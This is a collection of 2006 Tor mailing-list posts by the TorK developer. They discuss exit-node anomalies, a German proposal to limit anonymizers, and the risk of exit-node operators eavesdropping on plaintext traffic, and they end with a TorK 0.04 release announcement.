often does tor change its paths).



 Anyway, there will always be some people who don't
 understand the documentation, or don't even bother to
 read it. That's the case for every product and not a
 Tor specific problem.


I think there are subtleties to the safe use of Tor that require some 
technical understanding. And that is a Tor specific problem which shouldn't 
be overlooked.

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: Analyzing TOR-exitnodes for anomalies

2006-10-06 Thread Robert Hogan

 Hmmm... I had this problem with Whistlemother exit node and this site:
 http://www.iamaphex.net with the same
 frame.aspx?u=http%3a%2f%2flanding.domainsponsor.com blah blah blah
 filter ... =SUSPECTED+UNDESIRABLE+BOT


i have the same experience using whistlersmother for the same site. 

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: Analyzing TOR-exitnodes for anomalies

2006-10-06 Thread Robert Hogan
On Friday 06 October 2006 19:21, Robert Hogan wrote:
  Hmmm... I had this problem with Whistlemother exit node and this site:
  http://www.iamaphex.net with the same
  frame.aspx?u=http%3a%2f%2flanding.domainsponsor.com blah blah blah
  filter ... =SUSPECTED+UNDESIRABLE+BOT

 i have the same experience using whistlersmother for the same site.

And I have the same experience with practically every other exit node I try 
for this site. So whistlersmother is not the problem...
-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: GERMAN JUSTICE MINISTER CALLS FOR LIMITS TO NET ANONYMIZER

2006-08-23 Thread Robert Hogan
On Wednesday 23 August 2006 17:08, Bill Watson wrote:
 The means of defense against foreign danger historically have become
 the instruments of tyranny at home.

 James Madison, fourth president of
 the United States



 On Wed, 23 Aug 2006 08:56:00 -0700, Joseph Lorenzo Hall

 [EMAIL PROTECTED] said:
  GERMAN JUSTICE MINISTER CALLS FOR LIMITS TO NET ANONYMIZER
 
  The Minister of Justice of the German federal state of
  Schleswig-Holstein Uwe Döring has called for limits to be
  set - in the interest of combating terrorism - on
  anonymization on the Internet. The Minister said that the
  Independent State Center for Data Protection of
  Schleswig-Holstein (ULD), based in the state's capital of
  Kiel in northern Germany, should take the anonymization
  program it offers as a free download off the Internet
  immediately.
 
  http://www.heise.de/english/newsticker/news/77162
 
 
  --
If there was reasonable suspicion of a crime and if the German Code of 
Criminal Procedure provided for such an approach in the case in question, it 
was quite possible to register the IP addresses of computers, Mr. Weichert 
observed.

Umm. So it's only anonymous until they need to find out who you are? Or have I 
misunderstood the point?
-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: following on from today's discussion

2006-08-21 Thread Robert Hogan
On Monday 21 August 2006 18:20, Jay Goodman Tamboli wrote:
 (moving back to or-talk)

 On 2006.08.21, at 13:06, Robert Hogan wrote:
  On Sunday 20 August 2006 23:19, Chris Palmer wrote:
  Jay Goodman Tamboli writes:
  Is it true that your traffic is more likely to be eavesdropped upon?
 
  We can only speculate.  End-to-end encryption...
 
  It's not a matter of speculation. Using Tor expands the number of
  potential eavesdroppers by at least the number of exit nodes in the Tor
  network.

 While it's true the number of potential eavesdroppers across all
 connections increases that much, the number of potential
 eavesdroppers for any one connection or at any single time would seem
 to increase only a little. That is, without Tor you have your ISP and
 whatever computers are between it and your destination, and with Tor
 you have the exit node operator, his ISP, and whatever computers are
 between it and your destination. Whether the exit node operator is
 likely to eavesdrop is, I think, speculation.

 /jgt

That's correct - the activities of individual exit node operators are purely in 
the realms of speculation. 

But what is not speculation is that some of them are eavesdropping.

'Among other things, Tor is a handy tool for harvesting random 
username/password pairs.' I believe that's a true statement. And that's why I 
think Tor traffic is more likely to be eavesdropped upon: because it is as 
much a hacking tool for scriptkiddies as it is an anonymity network client 
for everyone else.

That's my only point really. Tor has a specific layer of exposure that is 
easily accessible to anyone who is interested in it. That is not true of 
non-Tor traffic.

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: following on from today's discussion

2006-08-21 Thread Robert Hogan
On Monday 21 August 2006 19:05, Chris Palmer wrote:
 Robert Hogan writes:
  It's not a matter of speculation. Using Tor expands the number of
  potential eavesdroppers by at least the number of exit nodes in the
  Tor network.

 I understood the question to be something like, Are Tor operators more
 likely to be eavesdroppers than regular IP-layer router operators, layer
 2 snoopers, spyware authors, and other meanies?  Maybe I misunderstood.


My point was that it's easier to run a tor exit node than do any of the above. 
That makes it more likely to happen. 

 There are so many opportunities for eavesdropping, and they are so often
 taken (on small and global scales), that worrying about Tor operators is
 relatively minor -- especially since if you really want security, you're
 already using end-to-end encryption anyway.  It's moot.

  I don't think the law is much consolation for someone who wants to
  remain anonymous!

 Again, I'm not saying -- I never even sort of said -- that people who
 want anonymity should pin their hopes on Tor operators knowing and
 observing US law.

Sorry, I was being a smartarse.

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


Re: following on from today's discussion

2006-08-18 Thread Robert Hogan
On Friday 18 August 2006 22:47, Roger Dingledine wrote:
 [Dropping the or-dev CC since this isn't related to Tor development]

 On Fri, Aug 18, 2006 at 10:14:29PM +0100, Robert Hogan wrote:
  That aside, I think it has highlighted a security risk that Tor itself
  may be guilty of understating to new users, namely that using Tor exposes
  your traffic to a much higher likelihood of being eavesdropped than
  normal.
 
  For example, I am not a network admin by day so I do not have access to
  public internet traffic through legal means. Yet I am running a Tor exit
  server, so I can now legally (though unethically) listen to your internet
  traffic and harvest any passwords that go by.

 Actually, look at
 http://tor.eff.org/eff/tor-legal-faq.html.en#ExitSnooping
 It is an open legal question -- that is, there's no clear precedent with
 respect to Tor servers -- but it's probably not wise to just assume that
 it's legal. Also, remember that there are many jurisdictions out there,
 and they all have their own complex laws.

  I do not think the gravity of this trade-off by the tor user (security
  for anonymity) is adequately represented.

 I agree. Somebody should write a clear introduction to Tor, what it does,
 and what it doesn't do. One day that somebody will be me, but I would
 welcome some early versions to help me along.

  Now that I see it for what it is, I am definitely going to introduce some
  sort of nag/warning to TorK so that the user is warned at least once that
  using plaintext protocols carrying authentication information on Tor
  carries a serious health warning.
 
  Am I overstating the case? Do others think that the nature of the
  compromise tor users make is transparent to them?

 The reason I haven't emphasized the issue so far is that I think you're
 overstating the protection ordinary users get from the Internet as it
 is. For example, if you're on a local network with other users (often
 including everybody in your neighborhood for cablemodem systems), you're
 not in very good shape. Tor solves this issue, and for many users it's
 a huge issue.

 Then there's the question of the Internet infrastructure itself --
 your Internet packets travel over a wide variety of places on the way
 to their destination. Sometimes packets get mis-routed to, well, pretty
 much anywhere. The chance that any hop along the way is able to observe
 them -- for example because of a crooked employee, but also because some
 Russian cracker 0wns a computer nearby in the path -- is hard to estimate
 in general, but from studying botnets and dealing with net security for
 the past decade or so, I don't feel it's as low as you imply.

 All that said, I agree with you that most of the danger is probably at
 the endpoints of the communication -- on the path from you to your entry
 Tor node, and on the path from your exit node to your destination. Tor
 solves the first issue and changes the second issue -- possibly for the
 worse, depending on your situation.

 So barring any actual data about the security of the Internet as a whole,
 which seems hard to get, I still stick with my answer from
 http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#ExitEavesdroppers

 If you're not using end-to-end encryption, then you're in bad shape,
 whether you use Tor (and are exposed to one set of risks) or don't use
 Tor (and are exposed to a different set of risks).

 --Roger

Thank you for that very considered response. 

Tor definitely does change the qualitative and quantitative risk of being 
eavesdropped though - and I think it is this fact that is understated. 

The anonymity provided by tor comes at a price: the increased risk of 
any-old-joe (and not just the corner cases of a crooked isp employee, or a 
hacker listening to misrouted packets) harvesting your traffic.

The exact degree of this increased risk obviously depends on your view of the 
risk posed by normal use of the internet, as you have pointed out.

My feeling is that anything that extends the circle of risk from exposure to 
hackers/crooked ISP employees/ISPs themselves to exposure to the likes of me 
(a curious amateur with no special privileges) represents a sea-change in the 
user's security 'posture'.

I'm not saying that the shift is catastrophic but it is definitely a 
compromise that needs more emphasis.


-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net


TorK 0.04 Released.

2006-07-05 Thread Robert Hogan
Hi there,

Just a quick note to let you know that TorK 0.04 has been released.

As you may or may not guess from the name, TorK is a Tor Controller for KDE. It 
provides a wide range of 'quick' configuration settings as well as the 
ability to granularly define the way you want Tor to run. You can create and 
manage circuits using a drag and drop interface. You can even update your Tor 
settings on the fly. The latest version also introduces a nifty little 
connection monitor which sits in whichever corner you choose and displays the 
state of your current Tor usage. And if you find it annoying rather than 
nifty you can simply turn it off.

TorK is available at http://tork.sf.net.

The users list is: [EMAIL PROTECTED]

If you try it out let me know how you get on and what you feel needs 
improvement - it's still very early days!

Thanks,
Robert

-- 

KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net
TorK   - A Tor Controller For KDE  - http://tork.sf.net